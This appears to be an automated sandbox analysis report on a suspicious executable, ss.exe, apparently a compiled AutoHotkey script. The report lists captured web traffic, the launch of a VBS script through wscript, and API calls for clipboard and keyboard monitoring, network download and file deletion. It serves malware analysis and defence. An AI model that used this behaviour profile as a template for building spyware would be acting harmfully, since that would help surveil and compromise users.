Apr 3, 2018 13:56:00.171987057 CEST	5	IN	Data Raw: 20 5b 5d 3b 0a 20 20 5f 67 61 71 2e 70 75 73 68 28 5b 27 5f 73 65 74 41 63 63 6f 75 6e 74 27 2c 20 27 55 41 2d 33 30 30 39 39 39 35 31 2d 31 27 5d 29 3b 0a 20 20 5f 67 61 71 2e 70 75 73 68 28 5b 27 5f 73 65 74 44 6f 6d 61 69 6e 4e 61 6d 65 27 2c Data Ascii: []; _gaq.push(['_setAccount', 'UA-30099951-1']); _gaq.push(['_setDomainName', 'none']); _gaq.push(['_setAllowLinker', true]); _gaq.push(['_trackPageview']); (function() { var ga = document.createElement('script'); ga.type = 'tex
Apr 3, 2018 13:56:00.172004938 CEST	6	IN	Data Raw: 20 7b 0a 20 20 20 20 20 20 20 20 64 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 22 2c 20 66 29 3b 0a 20 20 20 20 7d 20 65 6c 73 65 20 7b 20 66 28 29 3b 20 7d 0a 7d 29 28 64 6f 63 75 6d Data Ascii: { d.addEventListener("DOMContentLoaded", f); } else { f(); }})(document, window, "yandex_metrika_callbacks");</script><noscript><div><img src="//mc.yandex.ru/watch/14153041" style="position:absolute; left:-9999px;" alt="" /></d
Apr 3, 2018 13:56:00.172102928 CEST	7	IN	Data Raw: 74 65 72 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 66 6f 6f 74 65 72 2d 63 6f 6c 22 3e 0a 3c 68 34 3e 41 62 6f 75 74 20 75 43 6f 7a 3c 2f 68 34 3e 0a 3c Data Ascii: ter"> <div class="content"><div class="footer-col"><h4>About uCoz</h4><ul><li><a href="http://www.ucoz.com/tour/">About</a></li> <li><a href="http://top.ucoz.com/" target="_blank">Top Sites</a></li><li><a href="http://www.ucoz.com
Apr 3, 2018 13:56:00.270538092 CEST	7	IN	Data Raw: 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: l>0

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: ss.exe PID: 3596 Parent PID: 2972

General

Start time:	13:55:23
Start date:	21/05/2016
Path:	C:\Users\user\Desktop\ss.exe
Wow64 process (32bit):	false
Commandline:	'C:\Users\user\Desktop\ss.exe'
Imagebase:	0x400000
File size:	336896 bytes
MD5 hash:	B83E77AE26E3663301648318E38EC1B2
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low

Chronological Activities

Analysis Process: wscript.exe PID: 3764 Parent PID: 3596

General

Start time:	13:56:10
Start date:	21/05/2016
Path:	C:\Windows\System32\wscript.exe
Wow64 process (32bit):	false
Commandline:	'C:\Windows\System32\WScript.exe' 'C:\ProgramData\start.vbs'
Imagebase:	0xfd0000
File size:	141824 bytes
MD5 hash:	979D74799EA6C8B8167869A68DF5204A
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: ss.exe PID: 3596 Parent PID: 2972

Execution Graph

Execution Coverage:	1.2%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	14%
Total number of Nodes:	1245
Total number of Limit Nodes:	31

Executed Functions

Function 0040136A, Relevance: 72.7, APIs: 39, Strings: 2, Instructions: 987windowkeyboardtime

APIs

GlobalUnWire.KERNEL32(00000000), ref: 00401395
CloseClipboard.USER32 ref: 004013A1

Part of subcall function 004030C0: joyGetPosEx.WINMM ref: 004030EF

Part of subcall function 00402F00: GetTickCount.KERNEL32(?,0000000A), ref: 00402F83
Part of subcall function 00402F00: _strncpy.LIBCMT ref: 00402FF3

SetTimer.USER32(000601DA,00000009,0000000A), ref: 0040144A
GetTickCount.KERNEL32(?,00000000,00000000), ref: 0040146F

Part of subcall function 00403690: GetTickCount.KERNEL32(0040171F), ref: 004036C2

GetMessageA.USER32(?,00000000,00000000,-00000311), ref: 004014B6
GetTickCount.KERNEL32 ref: 004014C1
GetFocus.USER32 ref: 0040155B

Part of subcall function 004764E0: GetWindowLongA.USER32(?,000000F0), ref: 004764F4
Part of subcall function 004764E0: GetParent.USER32(?), ref: 00476504
Part of subcall function 004764E0: GetWindowLongA.USER32(00000000,000000F0), ref: 0047650F

ShowWindow.USER32(000601DA,00000000), ref: 00401B84

Part of subcall function 0045A160: GetWindowLongA.USER32(00000000,000000F0), ref: 0045A1A0
Part of subcall function 0045A160: GetParent.USER32(00000000), ref: 0045A1AA

TranslateAccelerator.USER32(00000000,?,?), ref: 004015A1
GetKeyState.USER32(00000011), ref: 004018EA
GetWindowLongA.USER32(?,000000F0), ref: 00401912
GetKeyState.USER32(00000010), ref: 00401954

Part of subcall function 00466F60: SendMessageA.USER32(?,00001304,00000000,00000000), ref: 00466F7A
Part of subcall function 00466F60: SendMessageA.USER32(?,0000130B,00000000,00000000), ref: 00466FB2
Part of subcall function 00466F60: SendMessageA.USER32(?,0000130C,-00000001,00000000), ref: 00466FF6
Part of subcall function 00466F60: GetDlgCtrlID.USER32 ref: 00467012
Part of subcall function 00466F60: PostMessageA.USER32(?,00000414,?,00000000), ref: 0046708A

GetKeyState.USER32(00000011), ref: 004019C0
GetKeyState.USER32(000000A5), ref: 004019D5

Part of subcall function 004012B0: GetDlgCtrlID.USER32(00000000), ref: 004012BC
Part of subcall function 004012B0: GetParent.USER32(00000000), ref: 004012C7
Part of subcall function 004012B0: GetDlgCtrlID.USER32(00000000), ref: 004012D4

SendMessageA.USER32(?,000000C2,00000001,0049881C), ref: 00401A1F
SendMessageA.USER32(?,000000B1,00000000,000000FF), ref: 00401A3C

Part of subcall function 00463460: PostMessageA.USER32(?,00000414,2AF80007,00000000), ref: 00463476

SendMessageA.USER32(00000000,00001116,00000000,00000000), ref: 00401A79
SendMessageA.USER32(00000000,00001116,00000001,00000000), ref: 00401A93
IsDialogMessage.USER32(?,?), ref: 00401AE3

Part of subcall function 00415A90: MessageBoxA.USER32(000601DA,?,001B2734,00010000), ref: 00415AF2
Part of subcall function 00415A90: IsWindow.USER32(000601DA), ref: 00415AFE
Part of subcall function 00415A90: DestroyWindow.USER32(000601DA), ref: 00415B16
Part of subcall function 00415A90: _strncpy.LIBCMT ref: 00415B90
Part of subcall function 00415A90: SetCurrentDirectoryA.KERNEL32(C:\Users\user\Desktop,00000000,004A8ED0,001BC918,00000000), ref: 00415BE9

KillTimer.USER32(000601DA,00000009), ref: 00401C52
GetForegroundWindow.USER32 ref: 00401CEB
GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00401CFE
GetClassNameA.USER32(00000000,?,00000020), ref: 00401D1B
IsDialogMessage.USER32(00000000,?), ref: 00401D5A
SetCurrentDirectoryA.KERNEL32(C:\Users\user\Desktop), ref: 00401D76
DragQueryFile.SHELL32(?,000000FF,00000000,00000000), ref: 00401EA8
DragFinish.SHELL32(?), ref: 00401EC3

Part of subcall function 00463400: ShowWindow.USER32(?,00000000), ref: 0046340A

Part of subcall function 00409680: SendMessageTimeoutA.USER32(000601DA,00000419,?,?,00000003,000003E8,?), ref: 0040970D

Part of subcall function 0040C660: CharUpperA.USER32(?), ref: 0040C6EA
Part of subcall function 0040C660: CharUpperA.USER32(?), ref: 0040C6FB
Part of subcall function 0040C660: Sleep.KERNEL32(00000000), ref: 0040C7AB

GetTickCount.KERNEL32 ref: 00402122
DragFinish.SHELL32(00000000), ref: 004021C9
DragFinish.SHELL32(00000000), ref: 004021FA
GetTickCount.KERNEL32 ref: 0040225B
GetTickCount.KERNEL32 ref: 00402275
_strncpy.LIBCMT ref: 00402293
_strncpy.LIBCMT ref: 004022B2
_strncpy.LIBCMT ref: 00402317

Part of subcall function 004034E0: SetCurrentDirectoryA.KERNEL32(C:\Users\user\Desktop,?,001B3348,0040333F), ref: 00403545
Part of subcall function 004034E0: GetTickCount.KERNEL32(?,001B3348,0040333F), ref: 004035B7

GetTickCount.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00402343

Part of subcall function 0040A3F0: GetTickCount.KERNEL32(00000000,?,?,001BC918), ref: 0040A417
Part of subcall function 0040A3F0: GetTickCount.KERNEL32(00000000,?,?,001BC918), ref: 0040A42D
Part of subcall function 0040A3F0: GetTickCount.KERNEL32 ref: 0040A53A
Part of subcall function 0040A3F0: PostMessageA.USER32(000601DA,00000312,?,00000000), ref: 0040A55B

Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(00000001), ref: 00401012
Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(0000000F), ref: 0040101A

Part of subcall function 00402EC0: GetTickCount.KERNEL32(00402D03,?,?,?,?,?,?), ref: 00402EC0

TranslateAccelerator.USER32(000601DA,0024027F,?), ref: 00402D3F
TranslateMessage.USER32(?), ref: 00402D68
DispatchMessageA.USER32(?), ref: 00402D73

Strings

#32770, xrefs: 00401D28
C:\Users\user\Desktop, xrefs: 00401D71

Memory Dump Source

Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ss.jbxd

Function 0042E250, Relevance: 60.1, APIs: 12, Strings: 22, Instructions: 594processwindowlibrary

APIs

CloseHandle.KERNEL32(?), ref: 0042E5D0

Part of subcall function 0044EF00: LoadLibraryA.KERNEL32(advapi32), ref: 0044EF17
Part of subcall function 0044EF00: GetProcAddress.KERNEL32(00000000,CreateProcessWithLogonW,?,?,?,?,0042E58B,?,?,?,?,00000000,00000000,?,?), ref: 0044EF52
Part of subcall function 0044EF00: FreeLibrary.KERNEL32(00000000,?,?,?,?,0042E58B,?,?,?,?,00000000,00000000,?,?), ref: 0044EF61
Part of subcall function 0044EF00: MultiByteToWideChar.KERNEL32 ref: 0044EFDF
Part of subcall function 0044EF00: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000104), ref: 0044EFFB
Part of subcall function 0044EF00: CloseHandle.KERNEL32(?), ref: 0044F09A
Part of subcall function 0044EF00: GetLastError.KERNEL32 ref: 0044F0C1
Part of subcall function 0044EF00: FreeLibrary.KERNEL32(00000000), ref: 0044F0D1

CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,?,00000044,00000000), ref: 0042E5BE
CloseHandle.KERNEL32(?), ref: 0042E611
GetLastError.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,?,00000044,00000000), ref: 0042E62B
SetCurrentDirectoryA.KERNEL32(?), ref: 0042E713
GetFileAttributesA.KERNEL32 ref: 0042E775
SetCurrentDirectoryA.KERNEL32(C:\Users\user\Desktop), ref: 0042E7A8
ShellExecuteEx.SHELL32(0000003C), ref: 0042E7BE
GetModuleHandleA.KERNEL32(kernel32.dll,GetProcessId), ref: 0042E7E2
GetProcAddress.KERNEL32(00000000), ref: 0042E7E9
GetLastError.KERNEL32 ref: 0042E829
FormatMessageA.KERNEL32(00001200,00000000,00000000,00000000,?,000001FF,00000000), ref: 0042E862

Part of subcall function 004719A0: _vswprintf_s.LIBCMT ref: 004719B9

Strings

edit, xrefs: 0042E2E3, 0042E39D
<, xrefs: 0042E65C
System verbs unsupported with RunAs., xrefs: 0042E438
explore, xrefs: 0042E2BF, 0042E379
\/., xrefs: 0042E73B
Failed attempt to launch program or document:, xrefs: 0042E8EB
kernel32.dll, xrefs: 0042E7DD
.exe.bat.com.cmd.hta, xrefs: 0042E763
find, xrefs: 0042E2AD, 0042E367
Launch Error (possibly related to RunAs):, xrefs: 0042E8E4, 0042E8FB
..., xrefs: 0042E8AD, 0042E8CF, 0042E8F0, 0042E8F9
C:\Users\user\Desktop, xrefs: 0042E7A3
%sAction: <%-0.400s%s>%sParams: <%-0.400s%s>, xrefs: 0042E8FC
open, xrefs: 0042E2D1, 0042E38B
Verb: <%s>, xrefs: 0042E872
String too long., xrefs: 0042E480
", xrefs: 0042E6CF
D, xrefs: 0042E4BA
GetProcessId, xrefs: 0042E7D8
print, xrefs: 0042E2F5, 0042E3AF
properties, xrefs: 0042E307, 0042E3C1, 0042E690
%s %s, xrefs: 0042E52E

Memory Dump Source

Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ss.jbxd

Function 00450930, Relevance: 44.1, APIs: 17, Strings: 8, Instructions: 326
librarywindow

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNEL32(wininet), ref: 0045093F
GetProcAddress.KERNEL32(00000000,InternetOpenA), ref: 0045098C
GetProcAddress.KERNEL32(00000000,InternetOpenUrlA), ref: 00450998
GetProcAddress.KERNEL32(00000000,InternetCloseHandle), ref: 004509A6
GetProcAddress.KERNEL32(00000000,InternetReadFileExA), ref: 004509B4
GetProcAddress.KERNEL32(00000000,InternetReadFile), ref: 004509C0
FreeLibrary.KERNEL32(00000000), ref: 00450A5A
FreeLibrary.KERNEL32(00000000), ref: 00450A97
GetTickCount.KERNEL32 ref: 00450B5F
PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 00450B82
GetTickCount.KERNEL32 ref: 00450B98
GetTickCount.KERNEL32 ref: 00450BFD
PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 00450C20
GetTickCount.KERNEL32 ref: 00450C36
FreeLibrary.KERNEL32(00000000), ref: 00450C7D
DeleteFileA.KERNEL32(?), ref: 00450C98
FreeLibrary.KERNEL32(00000000), ref: 00450CC2

Strings

(, xrefs: 00450B0C
InternetReadFile, xrefs: 004509B6
wininet, xrefs: 0045093A
InternetOpenA, xrefs: 00450986
InternetReadFileExA, xrefs: 004509A8
InternetOpenUrlA, xrefs: 0045098E
AutoHotkey, xrefs: 00450A46
InternetCloseHandle, xrefs: 0045099A

Memory Dump Source

Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ss.jbxd

Function 00403AF0, Relevance: 38.9, APIs: 13, Strings: 9, Instructions: 432
sleepwindow

Control-flow Graph

Executed
Not Executed

APIs

RtlInitializeCriticalSection.NTDLL(004A90F0), ref: 00403B09
SetErrorMode.KERNELBASE(00000001), ref: 00403B11
GetCurrentDirectoryA.KERNEL32(00000104,C:\Users\user\Desktop), ref: 00403B21

Part of subcall function 00420B20: _strncpy.LIBCMT ref: 00420B87

Part of subcall function 00414F80: GetModuleFileNameA.KERNEL32(00000000,00000800,00000800,?,00000000,?,00000000), ref: 00414FA3
Part of subcall function 00414F80: GetModuleFileNameA.KERNEL32(00000000,?,000007FE), ref: 004151B4

Part of subcall function 00415E50: SetCurrentDirectoryA.KERNEL32(001B26F8,004AC280,004AC280,00000068,00000000,00000000,00000000,004AC280), ref: 00415FBD
Part of subcall function 00415E50: GetSystemTimeAsFileTime.KERNEL32(004A8ED0,00000000,00498874,000000FF,00000000,00000001,ErrorLevel,00000000,00000003,004AC280,?,00000000,00000000,00000000,00000000,004AC280), ref: 00416042

FindWindowA.USER32(AutoHotkey,001B277C), ref: 00403E58
FindWindowA.USER32(AutoHotkey,001B277C), ref: 00403EBE
PostMessageA.USER32(00000000,00000044,00000406,00000000), ref: 00403ED5
Sleep.KERNEL32(00000014), ref: 00403EE5
IsWindow.USER32(00000000), ref: 00403EE8
Sleep.KERNEL32(00000014), ref: 00403F20
IsWindow.USER32(00000000), ref: 00403F23
Sleep.KERNEL32(00000064), ref: 00403F2F
SystemParametersInfoA.USER32(00002000,00000000,004A8DE4,00000000), ref: 00403F45

Part of subcall function 00415240: GetSystemMetrics.USER32(00000031), ref: 004152B0
Part of subcall function 00415240: LoadCursorA.USER32(00000000,00007F00), ref: 004152E0
Part of subcall function 00415240: RegisterClassExA.USER32 ref: 00415305
Part of subcall function 00415240: RegisterClassExA.USER32(?), ref: 0041534A
Part of subcall function 00415240: GetForegroundWindow.USER32 ref: 00415351
Part of subcall function 00415240: GetClassNameA.USER32(00000000,?,00000040), ref: 00415363
Part of subcall function 00415240: CreateWindowExA.USER32(00000001,AutoHotkey,?,00CF0000,80000000,80000000,80000000,80000000,00000000,00000000,00400000,00000000), ref: 004153D6
Part of subcall function 00415240: GetMenu.USER32(00000000), ref: 0041540B
Part of subcall function 00415240: EnableMenuItem.USER32(00000000,0000FF79,00000003), ref: 0041541B
Part of subcall function 00415240: CreateWindowExA.USER32(00000000,edit,00000000,50A00804,00000000,00000000,00000000,00000000,000601DA,00000001,00400000,00000000), ref: 00415453
Part of subcall function 00415240: GetDC.USER32(00000000), ref: 0041545F
Part of subcall function 00415240: GetDeviceCaps.GDI32(00000000,0000005A), ref: 00415499
Part of subcall function 00415240: MulDiv.KERNEL32(0000000A,00000000), ref: 004154A2
Part of subcall function 00415240: CreateFontA.GDI32(00000000), ref: 004154AB
Part of subcall function 00415240: ReleaseDC.USER32(000801CA,00000000), ref: 004154BD
Part of subcall function 00415240: SendMessageA.USER32(000801CA,00000030,3C0A0928,00000000), ref: 004154DB
Part of subcall function 00415240: SendMessageA.USER32(000801CA,000000C5,00000000,00000000), ref: 004154EC
Part of subcall function 00415240: ShowWindow.USER32(000601DA,00000000), ref: 004154FD
Part of subcall function 00415240: ShowWindow.USER32(000601DA,00000000), ref: 00415508
Part of subcall function 00415240: ShowWindow.USER32(000601DA,00000006), ref: 00415519
Part of subcall function 00415240: SetWindowLongA.USER32(000601DA,000000EC,00000000), ref: 00415526
Part of subcall function 00415240: LoadAcceleratorsA.USER32(00400000,000000D4), ref: 00415538

Part of subcall function 00484D71: __freebuf.LIBCMT ref: 00484DEB

SystemParametersInfoA.USER32(00002001,00000000,00000000,00000002), ref: 00403F5F

Part of subcall function 00484959: RtlAllocateHeap.NTDLL(00000000,00000001,00000001), ref: 0048499E

Part of subcall function 00409950: UnregisterHotKey.USER32(000601DA,004ABB00), ref: 004099F1
Part of subcall function 00409950: RegisterHotKey.USER32(000601DA,?,?,?), ref: 00409C59
Part of subcall function 00409950: UnregisterHotKey.USER32(000601DA,004ABB00), ref: 00409C81
Part of subcall function 00409950: SetTimer.USER32(000601DA,00000009,0000000A,00000000), ref: 00409D3D

Part of subcall function 00420DB0: _strncpy.LIBCMT ref: 00420E09

Part of subcall function 00415820: SetTimer.USER32(000601DA,0000000E,04EF6D80,00403830), ref: 00415880
Part of subcall function 00415820: GetTickCount.KERNEL32 ref: 004158A6
Part of subcall function 00415820: SetTimer.USER32(000601DA,0000000B,00000064,00403730), ref: 004158D5
Part of subcall function 00415820: GetTickCount.KERNEL32 ref: 004158E9
Part of subcall function 00415820: KillTimer.USER32(000601DA,0000000B), ref: 00415928

Strings

/force, xrefs: 00403C94
Could not close the previous instance of this script. Keep waiting?, xrefs: 00403F05
/ErrorStdOut, xrefs: 00403CA6
Out of memory., xrefs: 00403C2E
An older instance of this script is already running. Replace it with this instance?Note: To avoid this message, see #SingleInstance in the help file., xrefs: 00403E8E
Clipboard, xrefs: 00403FED, 0040401E
C:\Users\user\Desktop, xrefs: 00403B17, 00403B2F, 00403BF6, 00403C03, 00403C29, 00403C46, 00403C47
AutoHotkey, xrefs: 00403E53, 00403EB9
/restart, xrefs: 00403C70

Memory Dump Source

Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ss.jbxd

Function 004566A0, Relevance: 21.9, APIs: 9, Strings: 2, Instructions: 2614string

APIs

GetEnvironmentVariableA.KERNEL32(?,?,00000000), ref: 00456828

Part of subcall function 00420B20: _strncpy.LIBCMT ref: 00420B87

Part of subcall function 00420DB0: _strncpy.LIBCMT ref: 00420E09

GetEnvironmentVariableA.KERNEL32(?,?,00000000), ref: 00456AA5

Part of subcall function 00404080: IsClipboardFormatAvailable.USER32(00000001), ref: 00404096
Part of subcall function 00404080: IsClipboardFormatAvailable.USER32(0000000F), ref: 0040409C
Part of subcall function 00404080: GlobalUnWire.KERNEL32(00000000), ref: 0040410F
Part of subcall function 00404080: CloseClipboard.USER32 ref: 0040411B
Part of subcall function 00404080: GlobalFix.KERNEL32(00000000), ref: 00404136
Part of subcall function 00404080: DragQueryFile.SHELL32(00000000,000000FF,004987E9,00000000), ref: 00404194
Part of subcall function 00404080: DragQueryFile.SHELL32(00000000,00000000,00000000,00000000), ref: 004041BA
Part of subcall function 00404080: DragQueryFile.SHELL32(00000000,000000FF,004987E9,00000000), ref: 00404207
Part of subcall function 00404080: DragQueryFile.SHELL32(00000000,00000000,00000000,000003E7), ref: 0040422D

Part of subcall function 00474A50: GetEnvironmentVariableA.KERNEL32(?,?,00000000), ref: 00474AA3

__alldiv.INT64 ref: 004576CF
lstrcmpi.KERNEL32(?,00000000), ref: 00457B05
lstrcmpi.KERNEL32(?,00000000), ref: 00457B74
lstrcmpi.KERNEL32(?,00000000), ref: 00457BD1
lstrcmpi.KERNEL32(?,00000000), ref: 00457C22
lstrcmpi.KERNEL32(?,00000000), ref: 00457C73
lstrcmpi.KERNEL32(?,00000000), ref: 00457CC4

Part of subcall function 00485EC9: __isxdigit_l.LIBCMT ref: 00485EF0

Part of subcall function 00401050: __i64tow.LIBCMT ref: 0040106C
Part of subcall function 00401050: __i64tow.LIBCMT ref: 004010A0
Part of subcall function 00401050: CharUpperA.USER32(004987E7), ref: 004010B7

Part of subcall function 004719A0: _vswprintf_s.LIBCMT ref: 004719B9

Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(00000001), ref: 00401012
Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(0000000F), ref: 0040101A

Part of subcall function 00484959: RtlAllocateHeap.NTDLL(00000000,00000001,00000001), ref: 0048499E

Part of subcall function 004847B8: HeapFree.KERNEL32(00000000,00000000), ref: 004847CE
Part of subcall function 004847B8: GetLastError.KERNEL32(00000000,?,00488A13,00000000,?,0048A041,00000100,004719BE), ref: 004847E0

Strings

8|J, xrefs: 00456C59
Out of memory., xrefs: 0045826B, 004582A9, 004584EE

Memory Dump Source

Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ss.jbxd

Function 00423F40, Relevance: 18.4, APIs: 9, Strings: 1, Instructions: 889timewindowclipboard

APIs

CloseClipboard.USER32 ref: 00423FC2
GetTickCount.KERNEL32(?,?), ref: 00423FDA
PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 00424002
GetTickCount.KERNEL32(?,?), ref: 00424018
GetTickCount.KERNEL32(?,?), ref: 004240D4

Part of subcall function 00423F40: GlobalUnWire.KERNEL32(00000000), ref: 00423FB6

__alldiv.INT64 ref: 00425256

Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(00000001), ref: 00401012
Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(0000000F), ref: 0040101A

Part of subcall function 00471410: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,00000001,?,?,?), ref: 0047142A

GetSystemTimeAsFileTime.KERNEL32(?), ref: 00424F92
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00424FA8

Part of subcall function 004716A0: FileTimeToLocalFileTime.KERNEL32(?), ref: 004716B4
Part of subcall function 004716A0: FileTimeToSystemTime.KERNEL32(?,?), ref: 004716D2

Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 00471786
Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,004987E9,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 0047179C
Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717AC
Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717D0
Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717E4
Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717F4
Part of subcall function 00471750: __alldiv.INT64 ref: 00471816

Strings

SMHD, xrefs: 00424E6F, 00425129

Memory Dump Source

Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ss.jbxd

Function 004403A0, Relevance: 18.2, APIs: 12, Instructions: 217
window

Control-flow Graph

Executed
Not Executed

APIs

SetLastError.KERNEL32(00000000), ref: 0044041A
DeleteFileA.KERNELBASE(004987E9), ref: 00440421
GetLastError.KERNEL32 ref: 00440430
FindFirstFileA.KERNEL32(004987E9,?), ref: 004404AB
GetLastError.KERNEL32 ref: 004404BA
GetTickCount.KERNEL32 ref: 00440546
PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 00440565
GetTickCount.KERNEL32 ref: 0044057B
DeleteFileA.KERNEL32(?), ref: 004405CF
GetLastError.KERNEL32 ref: 004405D9
FindNextFileA.KERNEL32(?,00000010), ref: 004405F9
FindClose.KERNEL32(?), ref: 0044060C

Part of subcall function 0042D3E0: __itow.LIBCMT ref: 0042D40E

Memory Dump Source

Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ss.jbxd

Function 00472770, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 128

Control-flow Graph

Executed
Not Executed

APIs

__Stoull.NTSTC_LIBCMT ref: 004727D8
_strncpy.LIBCMT ref: 0047281A
FindFirstFileA.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 0047284C
FindClose.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 0047285B
FindFirstFileA.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00472897
FindClose.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 0047289F

Part of subcall function 004719E0: _vswprintf_s.LIBCMT ref: 00471A13

Strings

%s\, xrefs: 00472869

Memory Dump Source

Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp

Joe Sandbox IDA Plugin

